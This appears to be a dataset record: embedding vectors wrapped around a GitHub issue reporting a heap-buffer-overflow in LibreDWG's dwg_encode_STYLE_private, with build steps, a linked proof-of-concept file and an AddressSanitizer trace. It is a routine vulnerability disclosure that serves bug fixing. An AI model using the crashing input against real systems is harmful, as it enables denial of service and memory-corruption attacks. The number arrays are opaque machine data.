0.008920564316213131, 0.013258494436740875, 0.01594282127916813, -0.004456574562937021, 0.009105945937335491, 0.01687714457511902, 0.0008059466490522027, -0.011293449439108372, 0.03043225035071373, 0.014659980311989784, -0.007830520160496235, 0.0025675357319414616, 0.013503198511898518, 0.024203427135944366, 0.008445987477898598, 0.0037447090726345778, 0.007274375297129154, -0.005120240617543459, 0.0025397285353392363, 0.015675870701670647, 0.0018797698430716991, -0.01318434253334999, -0.01041844766587019, 0.006733061280101538, -0.002217164495959878, 0.013592181727290154, -0.027807245030999184, 0.026027582585811615, -0.015735194087028503, 0.008661029860377312, -0.003941213712096214, 0.005498419515788555, 0.004875537008047104, 0.018760621547698975, 0.014704471454024315, 0.004115472547709942, 0.013295571319758892, -0.001697168918326497, 0.020050877705216408, -0.014185402542352676, 0.004994181450456381, -0.010203405283391476, -0.014215064235031605, 0.00045719745685346425, -0.0034017530269920826, -0.01566104032099247, 0.008898318745195866, 0.000007096640729287174, 0.028459789231419563, -0.010982008650898933, 0.013065697625279427, -0.00745604932308197, 0.0150974802672863, 0.003993120510131121, -0.0031459263991564512, 0.03497039154171944, 0.005064626224339008, 0.003370238235220313, 0.01626909337937832, -0.0009408118203282356, -0.00936548039317131, 0.010581583715975285, 0.004404667764902115, -0.0033424310386180878, 0.011960823088884354, 0.010581583715975285, 0.013577351346611977, -0.011567814275622368, 0.011656797491014004, 0.012027560733258724, -0.002515628933906555, -0.0019984140526503325, -0.004089518915861845, -0.025226732715964317, 0.007941748946905136, 0.02475215680897236, -0.026161056011915207, 0.00892797950655222, -0.020940709859132767, -0.0016990227159112692, 0.00862395390868187, 0.008816750720143318, 0.01204980630427599, -0.0004270729550626129, 0.0008847338613122702, -0.013629257678985596, -0.01279133278876543, 0.01181251835078001, -0.010514846071600914, 0.017040280625224113, -0.005909966770559549, 0.008394080214202404, 0.006199161987751722, 0.004456574562937021, 0.03135174140334129, -0.007318866904824972, -0.025241563096642494, 0.0031589032150804996, -0.003279401222243905, -0.00018932099919766188, -0.0051869782619178295, -0.0019446533406153321, -0.0285636018961668, -0.004222993738949299, 0.02497461438179016, 0.0017064380226656795, 0.010433278977870941, -0.03164835274219513, -0.010344295762479305, -0.0013356746640056372, -0.0019224075367674232, 0.005791322328150272, 0.00843857228755951, 0.01044069416821003, -0.03336869552731514, 0.00950637087225914, 0.0007735049002803862, -0.005972996354103088, 0.01798943430185318, -0.013214003294706345, 0.0024266457185149193, -0.006295560393482447, -0.0018806967418640852, 0.02260172925889492, 0.022720374166965485, -0.020896218717098236, 0.018908927217125893, 0.016625026240944862, 0.006314098369330168, -0.008327343501150608, -0.000304721063002944, -0.00765255419537425, -0.00006830154597992077, -0.010833702981472015, 0.003277547424659133, 0.0024210840929299593, -0.039775483310222626, -0.011226711794734001, -0.008075224235653877, -0.00578019954264164, 0.011145143769681454, -0.011923747137188911, -0.016610193997621536, -0.010655736550688744, 0.029245806857943535, 0.015572058036923409, 0.0008300463086925447, 0.007704460993409157, -0.025508513674139977, 0.004004243295639753, -0.007615477778017521, 0.000609442126005888, -0.0068999044597148895, 0.013384554535150528, 0.021786050871014595, 0.004894075449556112, 0.028444958850741386, -0.009788150899112225, 0.015868667513132095, -0.015008497051894665, -0.003952336497604847, -0.011456585489213467, 0.02186020277440548, 0.006506895646452904, -0.006614416837692261, 0.009143022820353508, 0.015483074821531773, 0.012709764763712883, 0.009491539560258389, 0.00843115709722042, -0.03666107356548309, -0.006162085570394993, -0.01297671440988779, -0.007556155789643526, 0.006514310836791992, -0.025226732715964317, 0.002491529332473874, -0.008230945095419884, -0.012843240052461624, 0.0049608126282691956, -0.03298310190439224, -0.005383482668548822, 0.006317806430160999, -0.006076809950172901, -0.010781795717775822, -0.00012293120380491018, -0.009432218037545681, 0.009320988319814205, 0.007304036524146795, -0.015245785936713219, 0.013006376102566719, 0.0021559884771704674, -0.017677992582321167, -0.02013986185193062, 0.0014710032846778631, 0.018908927217125893, -0.004193332511931658, 0.0004446842067409307, -0.009654675610363483, -0.007037086877971888, 0.038707684725522995, -0.030639877542853355, -0.010210820473730564, 0.016372906044125557, 0.01594282127916813, -0.02105935476720333, 0.008305096998810768, 0.0003774833749048412, 0.03591954708099365, -0.04004243388772011, 0.005798737518489361, -0.023372916504740715, 0.008141961880028248, 0.0077786133624613285, 0.026902582496404648, 0.025197071954607964, -0.028919534757733345, 0.009573107585310936, 0.0032960856333374977, -0.0395975187420845, 0.025983089581131935, 0.005720877554267645, 0.009128191508352757, -0.009283912368118763, -0.0049608126282691956, 0.003967166878283024, -0.006562510039657354, -0.014786039479076862, 0.015868667513132095, 0.023654697462916374, -0.022824186831712723, -0.0019279690459370613, 0.0011623428435996175, -0.008646199479699135, 0.005012719426304102, 0.008920564316213131, -0.024440715089440346, 0.01879028230905533, -0.026769109070301056, 0.012331586331129074, 0.005698631517589092, 0.007659969385713339, 0.006488357204943895, -0.002007683040574193, 0.00633634440600872, 0.028978858143091202, -0.003911552485078573, -0.0061101787723600864, 0.02316528931260109, -0.026783939450979233, 0.005287084262818098, -0.022112321108579636, -0.030358096584677696, -0.002619442529976368, 0.009758489206433296, -0.014185402542352676, 0.0005399240180850029, -0.01718858629465103, 0.010277558118104935, 0.011345356702804565, 0.03144072741270065, -0.02340257726609707, -0.010425863787531853, -0.005572571884840727, -0.0007651626947335899, 0.015349599532783031, -0.015349599532783031, -0.01640256680548191, -0.00374656287021935, -0.0017768830293789506, 0.004363883752375841, -0.017351720482110977, -0.01411866582930088, 0.003142218803986907, -0.024633511900901794, 0.013280740939080715, -0.032834794372320175, -0.0016406275099143386, 0.012494722381234169, 0.014222479425370693, 0.00016997178317978978, -0.004323099739849567, 0.010818872600793839, -0.013925869017839432, 0.004486235789954662, -0.012828409671783447, 0.008683276362717152, 0.007474587764590979, -0.024010630324482918, -0.008445987477898598, 0.0004699424607679248, -0.0029531295876950026, -0.022942831739783287, -0.011426923796534538, -0.002039198065176606, 0.032686490565538406, 0.0066107092425227165, 0.0024952369276434183, -0.012435399927198887, 0.0068999044597148895, 0.006006365176290274, -0.024411054328083992, -0.0010909709380939603, -0.0036928022745996714, 0.0023840079084038734, -0.019383504986763, 0.0010770673397928476, -0.005227762274444103, 0.00010728962661232799, 0.017514856532216072, 0.014252140186727047, 0.011938577517867088, -0.011782856658101082, -0.013406800106167793, 0.004093226511031389, 0.018375027924776077, -0.009632430039346218, 0.023328425362706184, -0.001110436045564711, 0.017870789393782616, 0.006784968078136444, -0.01141950860619545, 0.021845372393727303, -0.0006423473823815584, -0.02716953307390213, -0.025879276916384697, -0.000030298311685328372, -0.002328393282368779, -0.013881376944482327, -0.0072447145357728004, -0.002257948275655508, -0.0016220893012359738, -0.027985211461782455, -0.004712401423603296, -0.01607629656791687, 0.028370805084705353, 0.011768026277422905, -0.008801920339465141, -0.0027955551631748676, 0.024485206231474876, 0.0068368748761713505, -0.0016591657185927033, -0.0013245517620816827, -0.018656808882951736, 0.004504773765802383, -0.014177987352013588, -0.003959751687943935, -0.0036483106669038534, -0.003184856614097953, 0.001649896614253521, -0.001513641094788909, 0.02433690056204796, -0.0023191242944449186, 0.0017518565291538835, 0.0023747386876493692, 0.005757953505963087, 0.01006251573562622, -0.010403617285192013, -0.0018491818336769938, 0.017514856532216072, 0.000079308585554827, -0.011263788677752018, -0.005754245910793543, 0.0017333183204755187, 0.009358065202832222, 0.001242983853444457, -0.0060953483916819096, 0.021370794624090195, 0.013451291248202324, 0.0158983301371336, -0.002599050523713231, -0.008705521933734417, -0.00899471715092659, 0.012427984736859798, 0.01752968691289425, -0.0012476184638217092, 0.010870778933167458, 0.005554033908993006, 0.0022505330853164196, 0.008794505149126053, 0.012806163169443607, 0.017781807109713554, -0.0011688312515616417, 0.015030743554234505, 0.02110384590923786, -0.00425265496596694, -0.007763782981783152, -0.005950750783085823, -0.011842179112136364, 0.003731732489541173, -0.012205527164041996, -0.009165268391370773, -0.008935394696891308, -0.0009992070263251662, 0.02292800135910511, 0.012435399927198887, -0.0086684450507164, 0.010336880572140217, 0.015646209940314293, -0.034881409257650375, -0.02791105955839157, 0.0002998547861352563, -0.002643542131409049, 0.016135618090629578, -0.00999577809125185, -0.008698106743395329, 0.01386654656380415, -0.014066758565604687, -0.007074163295328617, 0.006922150496393442, 0.03752124309539795, 0.008312513120472431, -0.008171622641384602, 0.005528080277144909, -0.004356468562036753, 0.0028530233539640903, -0.003859645687043667, -0.0070185489021241665, -0.004916321020573378, 0.00985488761216402, 0.007793444208800793, -0.0063215140253305435, -0.022616559639573097, 0.014111250638961792, -0.0026324193459004164, 0.016328414902091026, -0.015631379559636116, -0.01616527885198593, -0.005898843519389629, -0.04253396391868591, -0.02110384590923786, 0.008616538718342781, -0.024826308712363243, 0.027792414650321007, -0.003933798521757126, 0.006640370469540358, 0.001720341620966792, 0.00036473837099038064, 0.0016878998139873147, -0.031114453449845314, 0.0011428778525441885, -0.004137718118727207, 0.020940709859132767, 0.013658919371664524, -0.003959751687943935, 0.0021318888757377863, -0.021222490817308426, -0.01472671702504158, 0.005135071463882923, 0.0007827739464119077, -0.010411032475531101, -0.005505834706127644, 0.005364944692701101, -0.006358589977025986, 0.0038077388890087605, -0.011456585489213467, -0.0009992070263251662, 0.008030732162296772, 0.02218647487461567, -0.010144082829356194, -0.001782444422133267, 0.001559059601277113, -0.00462341820821166, 0.02316528931260109, 0.017722483724355698, -0.005654139909893274, 0.006047149188816547, 0.01104874536395073, -0.003677971661090851, 0.008030732162296772, 0.00533528346568346, -0.0030791889876127243, 0.021237321197986603, 0.01137501746416092, 0.02242376282811165, -0.0183601975440979, 0.011152558960020542, -0.011760611087083817, -0.00046832035877741873, -0.0011382432421669364, 0.00668856967240572, 0.008127130568027496, 0.003655725857242942, -0.0016999496147036552, -0.0050053042359650135, -0.010959762148559093, -0.03043225035071373, 0.009194929152727127, 0.024722496047616005, 0.014578412286937237, 0.00950637087225914, 0.0009602768695913255, 0.0020188060589134693, -0.022008508443832397, -0.01916104555130005, 0.003755832090973854, 0.008164207451045513, 0.02153393067419529, 0.014533920213580132, 0.02377334050834179, 0.02843012847006321, 0.010032854042947292, 0.0232542734593153, -0.005201808642596006, 0.022824186831712723, -0.011360187083482742, 0.010470354929566383, -0.007029671687632799, -0.015030743554234505, -0.00527966907247901, -0.009869717992842197, -0.004260070156306028, -0.003768808674067259, 0.01230192556977272, 0.022764865309000015, 0.012427984736859798, 0.0035815732553601265, -0.0010214528301730752, -0.004074688535183668, -0.004712401423603296, -0.0015757438959553838, -0.0006724718841724098, 0.0030680662021040916, 0.0013810931704938412, -0.001401485176756978, -0.0048681218177080154, 0.013340062461793423, 0.0014608072815462947, 0.0513729602098465, 0.010633490979671478, 0.02083689533174038, -0.009232006035745144, -0.0027158409357070923, -0.005138779059052467, -0.002873415360227227, -0.0032608630135655403, -0.02660597302019596, 0.01023306604474783, 0.003110703779384494, 0.013755317777395248, 0.009031793102622032, -0.0055948179215192795, -0.013154680840671062, -0.003941213712096214, -0.0005732927238568664, 0.006951811257749796, -0.027836907655000687, -0.010804042220115662, -0.01023306604474783, 0.0001889734121505171, 0.02479664795100689, -0.0025693895295262337, 0.004452866967767477, 0.008586877025663853, -0.007344820536673069, 0.015868667513132095, 0.010967177338898182, -0.033665306866168976, 0.016714008525013924, 0.006480942014604807, 0.00836441945284605, -0.02027333527803421, 0.01349578332155943, -0.005101702641695738, 0.0003818861732725054, 0.013480952940881252, 0.0143782002851367, -0.018671639263629913, -0.004608587361872196, 0.008816750720143318, -0.024203427135944366, -0.008097469806671143, 0.004156256560236216, 0.005483588669449091, -0.019116554409265518, -0.00950637087225914, 0.00266764173284173, 0.0027658939361572266, -0.00924683641642332, -0.010032854042947292, -0.02181571163237095, 0.002802970353513956, 0.011382432654500008, 0.003440683241933584, -0.02275003492832184, 0.005602233111858368, 0.0010474062291905284, 0.00379290827549994, -0.013695995323359966, -0.022720374166965485, -0.016891974955797195, 0.005924797151237726, -0.01850850321352482, 0.011908916756510735, -0.009684336371719837, 0.02125215157866478, 0.010774380527436733, 0.015230955556035042, 0.008609123528003693, -0.007934333756566048, -0.011100652627646923, 0.00008782454824540764, -0.0063660056330263615, -0.01724790781736374, 0.030372926965355873, -0.03023945353925228, -0.0077341217547655106, -0.00009547154331812635, -0.015705531463027, -0.01060382928699255, -0.01929452084004879, -0.014756378717720509, -0.011523322202265263, -0.0018853312358260155, -0.004033904522657394, 0.009009547531604767, -0.0014292923733592033, 0.010055099613964558, -0.013940699398517609, 0.007296621333807707, 0.0014580265851691365, 0.008497894741594791, 0.0025415823329240084, 0.009172683581709862, 0.01644705981016159, 0.0011577083496376872, 0.0032033948227763176, -0.002758478745818138, 0.0025397285353392363, -0.007404142525047064, -0.01770765334367752, -0.0028771229553967714, -0.018953418359160423, -0.004986766260117292, -0.019739435985684395, -0.006692277267575264, 0.008201283402740955, -0.012895146384835243, 0.010796627029776573, 0.0014190964866429567, 0.0057320003397762775, 0.01293222326785326, 0.008490478619933128, -0.0036983636673539877, 0.01770765334367752, 0.004486235789954662, 0.023595374077558517, 0.006239946000277996, -0.005083164665848017, -0.0012485453626140952, 0.018434349447488785, 0.000028487944291555323, 0.008490478619933128, -0.010826287791132927, 0.0071557313203811646, 0.03191530331969261, 0.029008518904447556, 0.008156792260706425, -0.006099055986851454, -0.015690701082348824, 0.012042391113936901, 0.013762732967734337, 0.0047161090187728405, 0.011315695010125637, 0.0007364285411313176, 0.0025026521179825068, -0.002825216157361865, 0.004286023322492838, -0.009602769277989864, 0.06495772302150726, 0.000407376151997596, 0.0026954489294439554, -0.03645344451069832, -0.00903920829296112, -0.012413154356181622, -0.0010928247356787324, -0.000060075235523981974, -0.019472487270832062, 0.009817811660468578, -0.01074471976608038, 0.005709754303097725, -0.00425265496596694, -0.005034965462982655, 0.029423773288726807, -0.005772784352302551, 0.02251274697482586, 0.0026250039227306843, 0.011797687038779259, 0.006881366483867168, -0.005535495933145285, 0.007144608534872532, 0.024069951847195625, -0.0024433298967778683, -0.0012763525592163205, 0.004549265373498201, 0.01738138310611248, 0.02040681056678295, 0.015245785936713219, -0.0033313080202788115, 0.010018023662269115, 0.00008046721632126719, 0.0071557313203811646, 0.017930112779140472, 0.002233848674222827, 0.001940945745445788, 0.007033379282802343, 0.007815689779818058, 0.01807841658592224, 0.011315695010125637, 0.005709754303097725, -0.010173744522035122, -0.002257948275655508, -0.0030328435823321342, -0.00046229545841924846, -0.019368672743439674, -0.0295869093388319, -0.003475905628874898, 0.006010072771459818, 0.01093010138720274, -0.013414215296506882, 0.007882427424192429, -0.0028122393414378166, -0.012042391113936901, 0.016669517382979393, 0.010959762148559093, -0.021637745201587677, 0.012279679998755455, -0.013162096031010151, -0.0017500026151537895, -0.015075234696269035, -0.011582644656300545, 0.007014841306954622 ]
2,085
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Hi, In release version 0.12.4, (also in the latest commit 45d2a29) There is heapbuffer-overflow in function dwg_encode_STYLE_private() in dwg.spec **reproduce** ./configure --enable-release CFLAGS="-fsanitize=address" ./configure --enable-release make ./dwgrewrite [poc] [heap-buffer-overflow_dwg_encode_STYLE_private.zip](https://github.com/LibreDWG/libredwg/files/6622024/heap-buffer-overflow_dwg_encode_STYLE_private.zip) ```c AddressSanitizer: heap-buffer-overflow on address 0x6020000020a0 at pc 0x562610b3fe1f bp 0x7ffeebfe3ae0 sp 0x7ffeebfe3ad0 READ of size 8 at 0x6020000020a0 thread T0 #0 0x562610b3fe1e in dwg_encode_STYLE_private /home/chiba/libredwg-check/src/dwg.spec:3047 #1 0x562610b3ef8e in dwg_encode_STYLE /home/chiba/libredwg-check/src/dwg.spec:3045 #2 0x5626118b3912 in dwg_encode_add_object /home/chiba/libredwg-check/src/encode.c:3667 #3 0x5626108a2eb6 in dwg_encode /home/chiba/libredwg-check/src/encode.c:2352 #4 0x56260f65e78d in dwg_write_file /home/chiba/libredwg-check/src/dwg.c:429 #5 0x56260f65af4f in main /home/chiba/libredwg-check/programs/dwgrewrite.c:349 #6 0x7fd6bdaa50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x56260f659bad in _start (/home/chiba/libredwg-check/asan-master/bin/dwgrewrite+0x207bad) 0x6020000020a0 is located 8 bytes to the right of 8-byte region [0x602000002090,0x602000002098) allocated by thread T0 here: #0 0x7fd6bdeccdc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6) #1 0x56260fc3f748 in dwg_setup_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #2 0x56260fc3fcb5 in dwg_decode_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #3 0x5626101c19b8 in dwg_decode_add_object /home/chiba/libredwg-check/src/decode.c:5900 #4 0x56260f72435f in read_2004_section_handles /home/chiba/libredwg-check/src/decode.c:2928 #5 0x56260f77dfd0 in decode_R2004 /home/chiba/libredwg-check/src/decode.c:3778 #6 0x56260f686735 in dwg_decode /home/chiba/libredwg-check/src/decode.c:252 #7 0x56260f65cb78 in dwg_read_file /home/chiba/libredwg-check/src/dwg.c:254 #8 0x56260f65ab44 in main /home/chiba/libredwg-check/programs/dwgrewrite.c:290 #9 0x7fd6bdaa50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/chiba/libredwg-check/src/dwg.spec:3047 in dwg_encode_STYLE_private Shadow bytes around the buggy address: 0x0c047fff83c0: fa fa 00 fa fa fa 00 04 fa fa 00 fa fa fa 00 fa 0x0c047fff83d0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff83e0: fa fa 00 fa fa fa 00 02 fa fa 00 fa fa fa 00 04 0x0c047fff83f0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8400: fa fa 02 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa =>0x0c047fff8410: fa fa 00 fa[fa]fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8420: fa fa 00 fa fa fa 00 fa fa fa 02 fa fa fa 00 fa 0x0c047fff8430: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8440: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8450: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8460: fa fa 00 fa fa fa 00 fa fa fa 04 fa fa fa 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2429575==ABORTING ```
heap-buffer-overflow in dwg_encode_STYLE_private() in dwg.spec
https://api.github.com/repos/LibreDWG/libredwg/issues/359/comments
1
2021-06-09T07:55:23
2022-02-06T17:26:33Z
https://github.com/LibreDWG/libredwg/issues/359
915,907,191
359
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : heap-buffer-overflow in dwg_encode_STYLE_private() in dwg.spec Issue date: --- start body --- Hi, In release version 0.12.4, (also in the latest commit 45d2a29) There is heapbuffer-overflow in function dwg_encode_STYLE_private() in dwg.spec **reproduce** ./configure --enable-release CFLAGS="-fsanitize=address" ./configure --enable-release make ./dwgrewrite [poc] [heap-buffer-overflow_dwg_encode_STYLE_private.zip](https://github.com/LibreDWG/libredwg/files/6622024/heap-buffer-overflow_dwg_encode_STYLE_private.zip) ```c AddressSanitizer: heap-buffer-overflow on address 0x6020000020a0 at pc 0x562610b3fe1f bp 0x7ffeebfe3ae0 sp 0x7ffeebfe3ad0 READ of size 8 at 0x6020000020a0 thread T0 #0 0x562610b3fe1e in dwg_encode_STYLE_private /home/chiba/libredwg-check/src/dwg.spec:3047 #1 0x562610b3ef8e in dwg_encode_STYLE /home/chiba/libredwg-check/src/dwg.spec:3045 #2 0x5626118b3912 in dwg_encode_add_object /home/chiba/libredwg-check/src/encode.c:3667 #3 0x5626108a2eb6 in dwg_encode /home/chiba/libredwg-check/src/encode.c:2352 #4 0x56260f65e78d in dwg_write_file /home/chiba/libredwg-check/src/dwg.c:429 #5 0x56260f65af4f in main /home/chiba/libredwg-check/programs/dwgrewrite.c:349 #6 0x7fd6bdaa50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x56260f659bad in _start (/home/chiba/libredwg-check/asan-master/bin/dwgrewrite+0x207bad) 0x6020000020a0 is located 8 bytes to the right of 8-byte region [0x602000002090,0x602000002098) allocated by thread T0 here: #0 0x7fd6bdeccdc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6) #1 0x56260fc3f748 in dwg_setup_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #2 0x56260fc3fcb5 in dwg_decode_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #3 0x5626101c19b8 in dwg_decode_add_object /home/chiba/libredwg-check/src/decode.c:5900 #4 0x56260f72435f in read_2004_section_handles /home/chiba/libredwg-check/src/decode.c:2928 #5 0x56260f77dfd0 in decode_R2004 /home/chiba/libredwg-check/src/decode.c:3778 #6 0x56260f686735 in dwg_decode /home/chiba/libredwg-check/src/decode.c:252 #7 0x56260f65cb78 in dwg_read_file /home/chiba/libredwg-check/src/dwg.c:254 #8 0x56260f65ab44 in main /home/chiba/libredwg-check/programs/dwgrewrite.c:290 #9 0x7fd6bdaa50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/chiba/libredwg-check/src/dwg.spec:3047 in dwg_encode_STYLE_private Shadow bytes around the buggy address: 0x0c047fff83c0: fa fa 00 fa fa fa 00 04 fa fa 00 fa fa fa 00 fa 0x0c047fff83d0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff83e0: fa fa 00 fa fa fa 00 02 fa fa 00 fa fa fa 00 04 0x0c047fff83f0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8400: fa fa 02 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa =>0x0c047fff8410: fa fa 00 fa[fa]fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8420: fa fa 00 fa fa fa 00 fa fa fa 02 fa fa fa 00 fa 0x0c047fff8430: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8440: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8450: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8460: fa fa 00 fa fa fa 00 fa fa fa 04 fa fa fa 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2429575==ABORTING ``` --- end body ---
4,099
[ -0.045357171446084976, -0.004099147394299507, -0.006580968387424946, 0.0020711859688162804, 0.06696955114603043, 0.03083365596830845, 0.010719737969338894, 0.05086112394928932, -0.009631915017962456, 0.020272407680749893, 0.006598978769034147, -0.010539635084569454, 0.027303634211421013, 0.022131072357296944, 0.021511517465114594, 0.032994892448186874, -0.022001398727297783, 0.0013948987470939755, 0.0033174995332956314, -0.013903961516916752, 0.021655600517988205, -0.026712896302342415, -0.008104640990495682, 0.043138302862644196, -0.019062114879488945, 0.02354308031499386, -0.0006848421762697399, 0.012304645963013172, 0.0012355074286460876, 0.008472051471471786, -0.005720075219869614, 0.030286142602562904, -0.000862693996168673, 0.01418492291122675, 0.021554742008447647, 0.014883722178637981, 0.049160949885845184, 0.08840902149677277, 0.002782593248412013, 0.01307548675686121, -0.010467593558132648, -0.0740584060549736, -0.0022080643102526665, 0.02035885863006115, 0.0038974317722022533, 0.021007228642702103, 0.011022311635315418, 0.013269998133182526, -0.01963844522833824, -0.004531394690275192, -0.004419730976223946, -0.0034129542764276266, -0.024594882503151894, -0.05097638815641403, 0.001360679161734879, -0.030545489862561226, 0.021410660818219185, 0.027346858754754066, 0.0071753086522221565, -0.004059524741023779, -0.023658346384763718, 0.027548573911190033, -0.008789032697677612, 0.02740449272096157, -0.01717463508248329, -0.002984308870509267, -0.012441524304449558, 0.02815372124314308, -0.036193523555994034, 0.01481168158352375, -0.021742049604654312, -0.036193523555994034, 0.017693331465125084, 0.056220993399620056, 0.031381167471408844, -0.011987664736807346, 0.00043990189442411065, 0.019551996141672134, -0.024349942803382874, 0.023269323632121086, -0.03233211487531662, 0.017923863604664803, -0.029911527410149574, 0.030401408672332764, -0.008421622216701508, -0.014465883374214172, -0.001139152329415083, -0.0679493099451065, 0.000178639791556634, -0.043109484016895294, -0.005190572235733271, 0.012254216708242893, 0.029306381940841675, -0.013414081186056137, 0.004625048488378525, -0.002858236664906144, -0.03749026730656624, -0.019090931862592697, -0.04140930995345116, -0.00907719787210226, -0.03725973516702652, 0.0029572932980954647, -0.007485086098313332, 0.020805513486266136, 0.019278239458799362, 0.03198631480336189, 0.021396251395344734, -0.021309802308678627, 0.008198294788599014, 0.10823477804660797, 0.015143071301281452, -0.01690087839961052, 0.007982171140611172, 0.03478151559829712, -0.01560413558036089, 0.03723092004656792, 0.016511855646967888, -0.011778744868934155, -0.03910399228334427, -0.0023773612920194864, -0.013932778500020504, -0.04777775704860687, -0.020200366154313087, -0.016324548050761223, -0.0033733316231518984, 0.020056284964084625, -0.0302285086363554, -0.01960962824523449, -0.04008375108242035, -0.005503951571881771, -0.01775096356868744, -0.04973727837204933, 0.004077534656971693, -0.03636642545461655, 0.011317680589854717, 0.00807582400739193, 0.0017812199657782912, 0.04452149197459221, -0.005759697873145342, -0.013702246360480785, -0.076536625623703, -0.04604876786470413, 0.007866905070841312, 0.00034016979043371975, 0.009783201850950718, -0.0014174116076901555, -0.0006281096721068025, 0.02001306042075157, -0.012628830969333649, -0.0017226864583790302, -0.013853532262146473, -0.021554742008447647, 0.014667598530650139, 0.03749026730656624, 0.03792251646518707, -0.027807923033833504, -0.019825752824544907, 0.04420451074838638, 0.0032562646083533764, -0.005150949582457542, -0.0067070405930280685, -0.025574645027518272, 0.013601388782262802, -0.03408991917967796, -0.0289893988519907, 0.018442559987306595, 0.04532835632562637, 0.03691393882036209, -0.012700872495770454, 0.02419145219027996, 0.019782528281211853, 0.005543574225157499, 0.03711565211415291, 0.0023719582241028547, -0.06281997263431549, 0.008803441189229488, 0.0032202438451349735, 0.012059705331921577, -0.007931741885840893, -0.019321464002132416, -0.014537924900650978, 0.009617507457733154, -0.00570926908403635, 0.023788021877408028, 0.029162298887968063, -0.005179766099900007, 0.03011324256658554, -0.03224566578865051, 0.018456969410181046, 0.0135797755792737, -0.01345730572938919, -0.011123169213533401, 0.009588690474629402, -0.035357847809791565, 0.008702583611011505, -0.019768118858337402, -0.011209619231522083, -0.010590064339339733, 0.0055291661992669106, 0.010129000060260296, -0.018327293917536736, -0.0030419419053941965, -0.016353365033864975, 0.0019505169475451112, -0.014271371997892857, 0.007982171140611172, -0.018557826057076454, 0.050601776689291, 0.0002888403832912445, -0.01641099713742733, -0.02491186559200287, -0.03593417629599571, 0.0015677977353334427, 0.002692541806027293, -0.03339832276105881, 0.014941355213522911, -0.013464509509503841, 0.0043981182388961315, -0.01418492291122675, -0.03501204773783684, 0.014581149443984032, -0.019580813124775887, -0.010042550042271614, -0.013435693457722664, -0.05377158895134926, 0.002685337560251355, -0.00342376041226089, -0.013284406624734402, -0.04022783413529396, 0.005356267094612122, 0.038210678845644, -0.019696077331900597, 0.010078570805490017, 0.005237399134784937, 0.010683717206120491, -0.013745470903813839, -0.004401720594614744, 0.008832257241010666, -0.03676985576748848, -0.010258674621582031, 0.014336208812892437, 0.04247552156448364, -0.04166866093873978, -0.04354173317551613, -0.006912358105182648, 0.06316576898097992, -0.024277901276946068, 0.0029140685219317675, -0.009653527289628983, 0.017318716272711754, 0.009703956544399261, -0.010121796280145645, 0.04408924654126167, -0.010366735979914665, 0.017203450202941895, 0.02541615441441536, 0.03365767374634743, 0.027447717264294624, -0.003337311092764139, -0.012138950638473034, 0.022044623270630836, -0.0035912564489990473, -0.02110808715224266, 0.02071906439960003, -0.005965015850961208, 0.002744771772995591, -0.01998424343764782, 0.014098472893238068, -0.003153605852276087, -0.03800896555185318, 0.04728787764906883, -0.01937909610569477, 0.0006744862184859812, -0.05204259976744652, -0.01972489431500435, 0.030142059549689293, 0.024623699486255646, 0.0035534347407519817, 0.015071029774844646, -0.01988338492810726, 0.01577703468501568, 0.02442198432981968, 0.004787140991538763, 0.04290777072310448, -0.005388685502111912, -0.029796261340379715, 0.004534996580332518, -0.021684417501091957, 0.011123169213533401, -0.019436730071902275, 0.0011472569312900305, -0.006516131106764078, -0.03414755314588547, -0.001467840513214469, 0.00749229034408927, 0.023615121841430664, -0.0037209305446594954, -0.016194872558116913, -0.013882349245250225, -0.021914949640631676, -0.03169815242290497, -0.02035885863006115, -0.012981833890080452, -0.01848578453063965, -0.02888854220509529, 0.012794526293873787, -0.03841239586472511, 0.022649768739938736, 